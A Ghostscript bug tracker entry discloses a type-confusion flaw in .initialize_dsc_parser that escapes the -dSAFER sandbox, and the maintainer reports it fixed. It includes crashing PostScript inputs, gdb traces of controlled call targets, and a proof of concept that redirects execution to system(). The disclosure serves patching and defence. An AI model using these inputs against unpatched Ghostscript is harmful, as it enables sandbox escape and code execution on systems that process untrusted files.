Bug 697190

Summary: .initialize_dsc_parser doesn't validate the parameter is a dict type before using it.
Product: Ghostscript Reporter: Tavis Ormandy <taviso>
Component: GeneralAssignee: Ken Sharp <ken.sharp>
Status: RESOLVED FIXED    
Severity: normal CC: fw
Priority: P4    
Version: 9.20   
Hardware: PC   
OS: Linux   
Customer: Word Size: ---

Description Tavis Ormandy 2016-10-04 15:23:22 UTC
.initialize_dsc_parser doesn't validate the parameter is a dict type before using it.

This is a security issue, because it can be abused to escape the -dSAFER sandbox.

GS>16#4141414141414141 .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65754 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:154
154	    gs_memory_t * const mem = (gs_memory_t *)dict_memory(pdict);
(gdb) x/i $pc
=> 0xa65754 <zinitialize_dsc_parser+43>:	mov    rax,QWORD PTR [rax+0x48]
(gdb) p/x $rax
$3 = 0x4141414141414141

Or trying random other types:

GS>currentdevice .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65775 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:155
155	    dsc_data_t * const data =
(gdb) x/i $pc
=> 0xa65775 <zinitialize_dsc_parser+76>:	call   rax
(gdb) p/x $rax
$10 = 0xc045894cc84d89cc
(gdb) x/x $rax
0xc045894cc84d89cc:	Cannot access memory at address 0xc045894cc84d89cc
Comment 1 Tavis Ormandy 2016-10-04 16:16:47 UTC
This looks pretty simple to exploit, it's possible to bypass ASLR using bug 697169 and reading /proc/self/maps, then you can simply call any routine you want.

(gdb) p system
$1 = {int (const char *)} 0x7ffff6ef4220 <system>
(gdb) r
GPL Ghostscript 9.20 (2016-09-26)
Copyright (C) 2016 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>16#4141414141414141 [16#4141414141414141 16#4141414141414141 16#7ffff6ef4220 16#4141414141414141] .initialize_dsc_parser
sh: -c: line 0: syntax error near unexpected token `)'
sh: -c: line 0: `
                  hU)iAAAAAAAA|��'
Comment 2 Ken Sharp 2016-10-05 05:17:55 UTC
Fixed in commit 875a0095f37626a721c7ff57d606a0f95af03913